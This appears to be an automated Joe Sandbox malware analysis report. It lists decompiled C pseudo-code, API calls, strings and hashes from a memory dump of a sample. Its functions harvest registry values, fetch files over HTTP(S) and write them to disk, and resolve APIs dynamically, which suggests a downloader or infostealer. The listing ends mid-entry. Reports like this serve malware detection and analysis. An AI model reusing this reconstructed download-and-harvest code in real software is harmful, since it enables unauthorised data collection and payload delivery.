0x004053e4
0x004053e4
0x004053f1
0x004053f1
0x004053fe
0x00405416

APIs

InternetOpenA.WININET(0041401A,00000000,00000000,00000000,00000000), ref: 004051CD
StrCmpCA.SHLWAPI(00000000,https://), ref: 004051F3
InternetSetOptionA.WININET(00000000,00000006,000927C0,00000004), ref: 0040522D
InternetConnectA.WININET(00000000,02E32480,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 00405253
InternetConnectA.WININET(00000000,02E32480,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00405278
HttpOpenRequestA.WININET(00000000,?,0040672D,00000000,00000000,00000000,00C00100,00000000), ref: 004052B3
HttpOpenRequestA.WININET(00000000,?,0040672D,00000000,00000000,00000000,00400100,00000000), ref: 004052DA
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405327
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00405343
StrCmpCA.SHLWAPI(?,200), ref: 00405359
Sleep.KERNEL32(00007530), ref: 00405374
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040539C
lstrcat.KERNEL32(?,00000000), ref: 004053D8
InternetCloseHandle.WININET(00000000), ref: 004053E4
InternetCloseHandle.WININET(00000000), ref: 004053F1
InternetCloseHandle.WININET(00000000), ref: 004053FE

Part of subcall function 00404830: memset.MSVCRT ref: 00404852
Part of subcall function 00404830: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000000,02E32480), ref: 0040487E
Part of subcall function 00404830: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000000,00000000,00000000), ref: 004048A6

Strings

200, xrefs: 0040534D
https://, xrefs: 004051EA

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Internet$Http$CloseHandleOpenRequest$BinaryConnectCryptString$FileInfoOptionQueryReadSendSleeplstrcatmemset
String ID: 200$https://
API String ID: 3903783505-2276523601
Opcode ID: ed28bf1071449e7ad06a5ff83b2de2c6207da898ebd1a13e635f1ef9f3c0d26e
Instruction ID: 3a11fd38065f95ba9f916252f7cceca424cf4b116932673e0c024cd65fd50a4c
Opcode Fuzzy Hash: ed28bf1071449e7ad06a5ff83b2de2c6207da898ebd1a13e635f1ef9f3c0d26e
Instruction Fuzzy Hash: F3612B71A45359ABEB24DB60CC49FDA77B4EB08740F1085AAB6097A1C0C7B86A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B330, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 129
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040B330(intOrPtr _a4) {
				int _v8;
				char _v1036;
				char _v2060;
				void* _v2064;
				void* _v2068;
				long _v2072;
				int _v2076;
				char _v3100;
				int _v3104;
				long _t44;
				char* _t69;
				char* _t77;
				char* _t84;
				char* _t87;
				void* _t92;

				_v2068 = 0;
				_v2064 = 0;
				_v2072 = 0;
				_v8 = 0xf003f;
				_v2076 = 0;
				_t69 =  *0x41a230; // 0x2e2e668
				_t44 = RegOpenKeyExA(0x80000002, _t69, 0, 0x20019,  &_v2068);
				if(_t44 == 0) {
					_v3104 = 0;
					while(_v2072 == 0) {
						_v2076 = 0x400;
						_v2072 = RegEnumKeyExA(_v2068, _v3104,  &_v1036,  &_v2076, 0, 0, 0, 0);
						if(_v2072 != 0) {
							L14:
							_v3104 = _v3104 + 1;
							continue;
						}
						_push( &_v1036);
						_t84 =  *0x41a230; // 0x2e2e668
						_push(_t84);
						wsprintfA( &_v2060, "%s\%s");
						_t92 = _t92 + 0x10;
						if(RegOpenKeyExA(0x80000002,  &_v2060, 0, 0x20019,  &_v2064) == 0) {
							_v2076 = 0x400;
							_t87 =  *0x41a71c; // 0x2e4bb60
							if(RegQueryValueExA(_v2064, _t87, 0,  &_v8,  &_v3100,  &_v2076) == 0) {
								_push( &_v3100);
								if( *0x41a908() > 1) {
									 *0x41aa24(_a4,  &_v3100);
									_v2076 = 0x400;
									_t77 =  *0x41a450; // 0x2e4bcf8
									if(RegQueryValueExA(_v2064, _t77, 0,  &_v8,  &_v3100,  &_v2076) == 0) {
										 *0x41aa24(_a4, " ");
										 *0x41aa24(_a4,  &_v3100);
									}
									 *0x41aa24(_a4, "\n");
								}
							}
							RegCloseKey(_v2064);
							goto L14;
						}
						RegCloseKey(_v2064);
						return RegCloseKey(_v2068);
					}
					return RegCloseKey(_v2068);
				}
				return _t44;
			}

0x0040b339
0x0040b343
0x0040b34d
0x0040b357
0x0040b35e
0x0040b376
0x0040b382
0x0040b38a
0x0040b391
0x0040b3ac
0x0040b3b9
0x0040b3ed
0x0040b3fa
0x0040b535
0x0040b3a6
0x00000000
0x0040b3a6
0x0040b406
0x0040b407
0x0040b40d
0x0040b41a
0x0040b420
0x0040b445
0x0040b466
0x0040b484
0x0040b49a
0x0040b4a6
0x0040b4b0
0x0040b4bd
0x0040b4c3
0x0040b4e1
0x0040b4f7
0x0040b502
0x0040b513
0x0040b513
0x0040b522
0x0040b522
0x0040b4b0
0x0040b52f
0x00000000
0x0040b52f
0x0040b44e
0x00000000
0x0040b45b
0x00000000
0x0040b541
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000002,02E2E668,00000000,00020019,00000000), ref: 0040B382
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 0040B3E7
wsprintfA.USER32 ref: 0040B41A
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000), ref: 0040B43D
RegCloseKey.ADVAPI32(00000000), ref: 0040B44E
RegCloseKey.ADVAPI32(00000000), ref: 0040B45B

Strings

?, xrefs: 0040B357
%s\%s, xrefs: 0040B40E

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: CloseOpen$Enumwsprintf
String ID: %s\%s$?
API String ID: 2323328657-4134130046
Opcode ID: 633d1f22a7f17ada43fb024a05cd16ca398fc31fbc6fe5000daf135038cd0860
Instruction ID: e40631872db9b85caa783e97e8400b31f68121603665a09a8b222e6f0c3b8f21
Opcode Fuzzy Hash: 633d1f22a7f17ada43fb024a05cd16ca398fc31fbc6fe5000daf135038cd0860
Instruction Fuzzy Hash: A2513CB1911218ABDB10CB50CD48FEA77B8FF48304F00C5A9A249A6180DB789AC5CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 00411520, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,00412A9A,?), ref: 00411528
StrCmpCA.SHLWAPI(?,00419340,?,00412A9A,?), ref: 00411575
StrCmpCA.SHLWAPI(?,.zip,?,00412A9A,?), ref: 0041158F
StrCmpCA.SHLWAPI(?,.zoo,?,00412A9A,?), ref: 004115A9

Strings

.zoo, xrefs: 004115A0
.gz, xrefs: 004115FC
.tgz, xrefs: 00411613
.zip, xrefs: 00411586
.lzh, xrefs: 004115CE
.arc, xrefs: 004115B7
.arj, xrefs: 004115E5

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 430f65423b4f0def573a6f751fbc7bb6154696510ea6a2334855bcd8a57c314c
Instruction ID: d5930b3a33e29c7b2ebfdd29e75950525031afcffcbb0299905607ea0d7068d1
Opcode Fuzzy Hash: 430f65423b4f0def573a6f751fbc7bb6154696510ea6a2334855bcd8a57c314c
Instruction Fuzzy Hash: DD318479B04204FB8B00DFB0C9849FF77B6AE59740B248056F61697760D239DE81EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004049E0, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 141
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004049E0(void* __ecx, char* _a4, CHAR* _a8) {
				intOrPtr _v8;
				void* _v12;
				long _v16;
				void* _v20;
				struct _OVERLAPPED* _v24;
				void _v1052;
				long _v1060;
				void* _v1064;
				long _v1068;
				void _v1324;
				long _v1328;
				struct _OVERLAPPED* _v1332;
				void* _t43;
				long _t46;
				int _t55;
				int _t58;
				long _t61;
				long _t65;
				long _t75;

				_v24 = 0;
				_v16 = 0;
				_v1068 = 0x100;
				_t43 = InternetOpenA(0x41401a, 1, 0, 0, 0);
				_v1064 = _t43;
				if(_v1064 != 0) {
					_t46 =  *0x41aa4c(E00404970(__ecx, __eflags, _a4), "https");
					__eflags = _t46;
					if(_t46 == 0) {
						_v16 = 1;
					}
					_v1332 = 0;
					while(1) {
						__eflags = _v1332 - 6;
						if(_v1332 >= 6) {
							break;
						}
						__eflags = _v16;
						if(_v16 == 0) {
							_v12 = InternetOpenUrlA(_v1064, _a4, 0, 0, 0x100, 0);
						} else {
							_v12 = InternetOpenUrlA(_v1064, _a4, 0, 0, 0x800100, 0);
						}
						_t61 = HttpQueryInfoA(_v12, 0x13,  &_v1324,  &_v1068, 0);
						__eflags = _t61;
						if(_t61 == 0) {
							L14:
							_t75 =  &(_v1332->Internal);
							__eflags = _t75;
							_v1332 = _t75;
							continue;
						} else {
							_t65 =  *0x41aa4c( &_v1324, "200");
							__eflags = _t65;
							if(_t65 != 0) {
								Sleep(0x7530);
								goto L14;
							}
							break;
						}
					}
					_v20 = CreateFileA(_a8, 0x40000000, 3, 0, 2, 0x80, 0);
					while(1) {
						__eflags = 1;
						if(1 == 0) {
							break;
						}
						_t55 = InternetReadFile(_v12,  &_v1052, 0x400,  &_v1060);
						__eflags = _t55;
						if(_t55 == 0) {
							L21:
							break;
						}
						__eflags = _v1060;
						if(_v1060 <= 0) {
							L22:
							_v8 = _v8 + _v1060;
							__eflags = _v1060 - 0x400;
							if(_v1060 >= 0x400) {
								continue;
							}
							break;
						}
						_t58 = WriteFile(_v20,  &_v1052, _v1060,  &_v1328, 0);
						__eflags = _t58;
						if(_t58 == 0) {
							goto L21;
						}
						__eflags = _v1060 - _v1328;
						if(_v1060 == _v1328) {
							goto L22;
						}
						goto L21;
					}
					E0040B720( &_v1052, 0x400);
					CloseHandle(_v20);
					InternetCloseHandle(_v12);
					return InternetCloseHandle(_v1064);
				}
				return _t43;
			}

0x004049e9
0x004049f0
0x004049f7
0x00404a0e
0x00404a14
0x00404a21
0x00404a3a
0x00404a40
0x00404a42
0x00404a44
0x00404a44
0x00404a4b
0x00404a66
0x00404a66
0x00404a6d
0x00000000
0x00000000
0x00404a73
0x00404a77
0x00404ab6
0x00404a79
0x00404a95
0x00404a95
0x00404acf
0x00404ad5
0x00404ad7
0x00404afc
0x00404a5d
0x00404a5d
0x00404a60
0x00000000
0x00404ad9
0x00404ae5
0x00404aeb
0x00404aed
0x00404af6
0x00000000
0x00404af6
0x00000000
0x00404aef
0x00404ad7
0x00404b1d
0x00404b20
0x00404b25
0x00404b27
0x00000000
0x00000000
0x00404b40
0x00404b46
0x00404b48
0x00404b86
0x00000000
0x00404b86
0x00404b4a
0x00404b51
0x00404b88
0x00404b91
0x00404b94
0x00404b9e
0x00000000
0x00404ba2
0x00000000
0x00404ba0
0x00404b6e
0x00404b74
0x00404b76
0x00000000
0x00000000
0x00404b7e
0x00404b84
0x00000000
0x00000000
0x00000000
0x00404b84
0x00404bb3
0x00404bbc
0x00404bc6
0x00000000
0x00404bd3
0x00000000

APIs

InternetOpenA.WININET(0041401A,00000001,00000000,00000000,00000000), ref: 00404A0E
StrCmpCA.SHLWAPI(00000000,https), ref: 00404A3A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00800100,00000000), ref: 00404A8F
HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 00404ACF
StrCmpCA.SHLWAPI(?,200), ref: 00404AE5
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404B17
InternetReadFile.WININET(?,?,00000400,?), ref: 00404B40
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404B6E
CloseHandle.KERNEL32(?,?,00000400), ref: 00404BBC
InternetCloseHandle.WININET(?), ref: 00404BC6
InternetCloseHandle.WININET(00000000), ref: 00404BD3

Strings

200, xrefs: 00404AD9
https, xrefs: 00404A28

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open$CreateHttpInfoQueryReadWrite
String ID: 200$https
API String ID: 1681390745-2945048398
Opcode ID: c31e8308ac884f8f2725585f2c0d583281fa0a271bead2ab3ea92c6ff43d03ad
Instruction ID: fb624ede4d81cfb8019f53897a3e05eb4db491724901a2fa6b1ef0cdd0b3c389
Opcode Fuzzy Hash: c31e8308ac884f8f2725585f2c0d583281fa0a271bead2ab3ea92c6ff43d03ad
Instruction Fuzzy Hash: 8F5141F1A40208ABDB10DB90DC45FEA77B8BB88715F1080A9F705B62C0D778AA80CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 02D253F0, Relevance: 24.2, APIs: 16, Instructions: 172networksleepfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0041401A,00000000,00000000,00000000,00000000), ref: 02D2541D
StrCmpCA.SHLWAPI(00000000,00418B90), ref: 02D25443
InternetSetOptionA.WININET(00000000,00000006,000927C0,00000004), ref: 02D2547D
InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 02D254A3
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 02D254C8
HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00C00100,00000000), ref: 02D25503
HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00400100,00000000), ref: 02D2552A
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02D25577
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02D25593
StrCmpCA.SHLWAPI(?,00418B8C), ref: 02D255A9
Sleep.KERNEL32(00007530), ref: 02D255C4
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02D255EC
lstrcat.KERNEL32(?,00000000), ref: 02D25628
InternetCloseHandle.WININET(00000000), ref: 02D25634
InternetCloseHandle.WININET(00000000), ref: 02D25641
InternetCloseHandle.WININET(00000000), ref: 02D2564E

Part of subcall function 02D24A80: CryptStringToBinaryA.CRYPT32(?,00000000,00000000), ref: 02D24ACE
Part of subcall function 02D24A80: CryptStringToBinaryA.CRYPT32(?,00000000,00000000,00000000), ref: 02D24AF6

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Internet$Http$CloseHandleOpenRequest$BinaryConnectCryptString$FileInfoOptionQueryReadSendSleeplstrcat
String ID:
API String ID: 381316015-0
Opcode ID: a6722cafb6227cf9e283476907adda51c7ac685d6552fbd8e5ce2c83df479042
Instruction ID: 7c4a99cca4f3252b0925c59c95f816f4d8b1d0a81459a07747a96d35a44706eb
Opcode Fuzzy Hash: a6722cafb6227cf9e283476907adda51c7ac685d6552fbd8e5ce2c83df479042
Instruction Fuzzy Hash: 75615E71A41359ABEB24CF50DC49FED77B8BB08705F508199F2097A2C0C7B8AA88CF55

Uniqueness

Uniqueness Score: -1.00%

Function 02D25670, Relevance: 22.7, APIs: 18, Instructions: 180stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0041A368), ref: 02D256EC
lstrcat.KERNEL32(?,0041A7C4), ref: 02D25700
lstrcat.KERNEL32(?,0041A11C), ref: 02D25714
lstrcat.KERNEL32(?,0041A368), ref: 02D25727
lstrcat.KERNEL32(?,0041A7C4), ref: 02D2573B
lstrcat.KERNEL32(?,0041A3B4), ref: 02D2574F
lstrcat.KERNEL32(?,0041A368), ref: 02D25762
lstrcat.KERNEL32(?,0041A7C4), ref: 02D25776
lstrcat.KERNEL32(?,0041A090), ref: 02D2578A
lstrcat.KERNEL32(?,0041A368), ref: 02D2579D
lstrcat.KERNEL32(?,0041A7C4), ref: 02D257B1
lstrcat.KERNEL32(?,0041A604), ref: 02D257C5
lstrcat.KERNEL32(?,0041A368), ref: 02D257D8
lstrcat.KERNEL32(?,0041A7C4), ref: 02D257EC
lstrcat.KERNEL32(?,0041A630), ref: 02D25800
lstrcat.KERNEL32(?,0041A368), ref: 02D25813
lstrcat.KERNEL32(?,0041A7C4), ref: 02D25827
lstrcat.KERNEL32(?,0041A674), ref: 02D2583B

Part of subcall function 02D24C30: InternetOpenA.WININET(0041401A,00000001,00000000,00000000,00000000), ref: 02D24C5E

Part of subcall function 02D24C30: StrCmpCA.SHLWAPI(00000000,00418B84), ref: 02D24C8A
Part of subcall function 02D24C30: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00800100,00000000), ref: 02D24CDF
Part of subcall function 02D24C30: HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 02D24D1F
Part of subcall function 02D24C30: StrCmpCA.SHLWAPI(?,00418B8C), ref: 02D24D35
Part of subcall function 02D24C30: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02D24D67
Part of subcall function 02D24C30: InternetReadFile.WININET(?,?,00000400,?), ref: 02D24D90
Part of subcall function 02D24C30: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D24DBE
Part of subcall function 02D24C30: CloseHandle.KERNEL32(?,?,00000400), ref: 02D24E0C
Part of subcall function 02D24C30: InternetCloseHandle.WININET(?), ref: 02D24E16
Part of subcall function 02D24C30: InternetCloseHandle.WININET(00000000), ref: 02D24E23

Part of subcall function 02D24C30: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000100,00000000), ref: 02D24D00
Part of subcall function 02D24C30: Sleep.KERNEL32(00007530), ref: 02D24D46

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$Internet$CloseFileHandleOpen$CreateHttpInfoQueryReadSleepWrite
String ID:
API String ID: 3671864319-0
Opcode ID: f0cdc9165babbdbcea85b9a89b8e2ceea59233cf9381ccee5635e80114939224
Instruction ID: 8d3ed562e342451b3c5a6dac196bcd36463cbacd29b30cdb3375f98f1569f066
Opcode Fuzzy Hash: f0cdc9165babbdbcea85b9a89b8e2ceea59233cf9381ccee5635e80114939224
Instruction Fuzzy Hash: E361B7F6511218ABC710EBA0DD88EDA33FDFB5C704F04859AF21553150DA74ABA8CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00405420, Relevance: 22.7, APIs: 18, Instructions: 180
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00405420(void* __ecx) {
				char _v268;
				char _v532;
				char _v796;
				char _v1060;
				char _v1324;
				char _v1588;
				intOrPtr _t45;
				intOrPtr _t50;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t111;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;

				E0040B720( &_v1324, 0x104);
				E0040B720( &_v268, 0x104);
				E0040B720( &_v796, 0x104);
				E0040B720( &_v1588, 0x104);
				E0040B720( &_v532, 0x104);
				E0040B720( &_v1060, 0x104);
				_t45 =  *0x41a368; // 0x2e32480
				 *0x41aa24( &_v1324, _t45);
				_t116 =  *0x41a7c4; // 0x2e32f68
				 *0x41aa24( &_v1324, _t116);
				_t97 =  *0x41a11c; // 0x2e46ef8
				 *0x41aa24( &_v1324, _t97);
				_t50 =  *0x41a368; // 0x2e32480
				 *0x41aa24( &_v268, _t50);
				_t118 =  *0x41a7c4; // 0x2e32f68
				 *0x41aa24( &_v268, _t118);
				_t99 =  *0x41a3b4; // 0x2e46f28
				 *0x41aa24( &_v268, _t99);
				_t55 =  *0x41a368; // 0x2e32480
				 *0x41aa24( &_v796, _t55);
				_t120 =  *0x41a7c4; // 0x2e32f68
				 *0x41aa24( &_v796, _t120);
				_t101 =  *0x41a090; // 0x2e46e08
				 *0x41aa24( &_v796, _t101);
				_t60 =  *0x41a368; // 0x2e32480
				 *0x41aa24( &_v1588, _t60);
				_t122 =  *0x41a7c4; // 0x2e32f68
				 *0x41aa24( &_v1588, _t122);
				_t103 =  *0x41a604; // 0x2e470c0
				 *0x41aa24( &_v1588, _t103);
				_t65 =  *0x41a368; // 0x2e32480
				 *0x41aa24( &_v532, _t65);
				_t124 =  *0x41a7c4; // 0x2e32f68
				 *0x41aa24( &_v532, _t124);
				_t105 =  *0x41a630; // 0x2e47060
				 *0x41aa24( &_v532, _t105);
				_t70 =  *0x41a368; // 0x2e32480
				 *0x41aa24( &_v1060, _t70);
				_t126 =  *0x41a7c4; // 0x2e32f68
				 *0x41aa24( &_v1060, _t126);
				_t107 =  *0x41a674; // 0x2e332a8
				 *0x41aa24( &_v1060, _t107);
				_t75 =  *0x41a2f0; // 0x2e49608
				_t108 =  &_v1324;
				E004049E0( &_v1324,  &_v1324, _t75);
				_t128 =  *0x41a650; // 0x2e491d0
				E004049E0(_t108,  &_v268, _t128);
				_t109 =  *0x41a220; // 0x2e491f8
				E004049E0(_t109,  &_v796, _t109);
				_t80 =  *0x41a6cc; // 0x2e332e8
				_t110 =  &_v1588;
				E004049E0( &_v1588,  &_v1588, _t80);
				_t130 =  *0x41a4a8; // 0x2e49220
				E004049E0(_t110,  &_v532, _t130);
				_t111 =  *0x41a700; // 0x2e49298
				E004049E0(_t111,  &_v1060, _t111);
				E0040B720( &_v1324, 0x104);
				E0040B720( &_v268, 0x104);
				E0040B720( &_v796, 0x104);
				E0040B720( &_v1588, 0x104);
				E0040B720( &_v532, 0x104);
				return E0040B720( &_v1060, 0x104);
			}

0x00405435
0x00405446
0x00405457
0x00405468
0x00405479
0x0040548a
0x0040548f
0x0040549c
0x004054a2
0x004054b0
0x004054b6
0x004054c4
0x004054ca
0x004054d7
0x004054dd
0x004054eb
0x004054f1
0x004054ff
0x00405505
0x00405512
0x00405518
0x00405526
0x0040552c
0x0040553a
0x00405540
0x0040554d
0x00405553
0x00405561
0x00405567
0x00405575
0x0040557b
0x00405588
0x0040558e
0x0040559c
0x004055a2
0x004055b0
0x004055b6
0x004055c3
0x004055c9
0x004055d7
0x004055dd
0x004055eb
0x004055f1
0x004055f7
0x004055fe
0x00405606
0x00405614
0x0040561c
0x0040562a
0x00405632
0x00405638
0x0040563f
0x00405647
0x00405655
0x0040565d
0x0040566b
0x0040567f
0x00405690
0x004056a1
0x004056b2
0x004056c3
0x004056dc

APIs

lstrcat.KERNEL32(?,02E32480), ref: 0040549C
lstrcat.KERNEL32(?,02E32F68), ref: 004054B0
lstrcat.KERNEL32(?,02E46EF8), ref: 004054C4
lstrcat.KERNEL32(?,02E32480), ref: 004054D7
lstrcat.KERNEL32(?,02E32F68), ref: 004054EB
lstrcat.KERNEL32(?,02E46F28), ref: 004054FF
lstrcat.KERNEL32(?,02E32480), ref: 00405512
lstrcat.KERNEL32(?,02E32F68), ref: 00405526
lstrcat.KERNEL32(?,02E46E08), ref: 0040553A
lstrcat.KERNEL32(?,02E32480), ref: 0040554D
lstrcat.KERNEL32(?,02E32F68), ref: 00405561
lstrcat.KERNEL32(?,02E470C0), ref: 00405575
lstrcat.KERNEL32(?,02E32480), ref: 00405588
lstrcat.KERNEL32(?,02E32F68), ref: 0040559C
lstrcat.KERNEL32(?,02E47060), ref: 004055B0
lstrcat.KERNEL32(?,02E32480), ref: 004055C3
lstrcat.KERNEL32(?,02E32F68), ref: 004055D7
lstrcat.KERNEL32(?,02E332A8), ref: 004055EB

Part of subcall function 004049E0: InternetOpenA.WININET(0041401A,00000001,00000000,00000000,00000000), ref: 00404A0E

Part of subcall function 004049E0: StrCmpCA.SHLWAPI(00000000,https), ref: 00404A3A
Part of subcall function 004049E0: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00800100,00000000), ref: 00404A8F
Part of subcall function 004049E0: HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 00404ACF
Part of subcall function 004049E0: StrCmpCA.SHLWAPI(?,200), ref: 00404AE5
Part of subcall function 004049E0: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404B17
Part of subcall function 004049E0: InternetReadFile.WININET(?,?,00000400,?), ref: 00404B40
Part of subcall function 004049E0: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404B6E
Part of subcall function 004049E0: CloseHandle.KERNEL32(?,?,00000400), ref: 00404BBC
Part of subcall function 004049E0: InternetCloseHandle.WININET(?), ref: 00404BC6
Part of subcall function 004049E0: InternetCloseHandle.WININET(00000000), ref: 00404BD3

Part of subcall function 004049E0: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000100,00000000), ref: 00404AB0
Part of subcall function 004049E0: Sleep.KERNEL32(00007530), ref: 00404AF6

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$Internet$CloseFileHandleOpen$CreateHttpInfoQueryReadSleepWrite
String ID:
API String ID: 3671864319-0
Opcode ID: 523f6f94308fdabadb63e5cab476504b7bf4905b54afa8b5587d7d0ed3e38dc8
Instruction ID: 5a6f90b88bf48c53f68c00fc2f1db0b98238631f3db8af8a6affdc9d9dd0ffe7
Opcode Fuzzy Hash: 523f6f94308fdabadb63e5cab476504b7bf4905b54afa8b5587d7d0ed3e38dc8
Instruction Fuzzy Hash: AB6178F6511118ABC710EBA0DD85DEA33B8FB4C704F0485AEF21593191DB7897A4CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 02D2C530, Relevance: 22.6, APIs: 15, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(0041AA64,0041A718), ref: 02D2C582
GetProcAddress.KERNEL32(0041AA64,0041A33C), ref: 02D2C59A
GetProcAddress.KERNEL32(0041AA64,0041A5BC), ref: 02D2C5B2
GetProcAddress.KERNEL32(0041AA64,0041A4B0), ref: 02D2C5CB
GetProcAddress.KERNEL32(0041AA64,0041A4C8), ref: 02D2C5E3
GetProcAddress.KERNEL32(0041AA64,0041A7D4), ref: 02D2C5FB
GetProcAddress.KERNEL32(0041AA64,0041A324), ref: 02D2C614
GetProcAddress.KERNEL32(0041AA64,0041A6F0), ref: 02D2C62C
GetProcAddress.KERNEL32(0041AA64,0041A7B0), ref: 02D2C644
GetProcAddress.KERNEL32(0041AA64,0041A218), ref: 02D2C65D
GetProcAddress.KERNEL32(0041AA64,004192A0), ref: 02D2C673
LoadLibraryA.KERNEL32(0041A0F8,?,02D26DC2), ref: 02D2C685
LoadLibraryA.KERNEL32(0041A658,?,02D26DC2), ref: 02D2C697
GetProcAddress.KERNEL32(0041A854,0041A594), ref: 02D2C6B8
GetProcAddress.KERNEL32(0041A934,0041A0B8), ref: 02D2C6D9

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 2656e5721d2e72d8ddd254abdf4fc75b759c6e6593f162f059aa174bfdec3ac2
Instruction ID: 0d0019daf7f42661a2ce95ec6c30c69dad69aa7725e2b38e330419e1f748296e
Opcode Fuzzy Hash: 2656e5721d2e72d8ddd254abdf4fc75b759c6e6593f162f059aa174bfdec3ac2
Instruction Fuzzy Hash: 304183F5523200DFC304DFA8EE489A637BABB8C251705C939E509C3631D73899A5CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCF0, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 0040BDE3
g@A, xrefs: 0040BD1C, 0040BE70, 0040BD1F, 0040BE73
g@A, xrefs: 0040BE4C, 0040BE4F

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID:
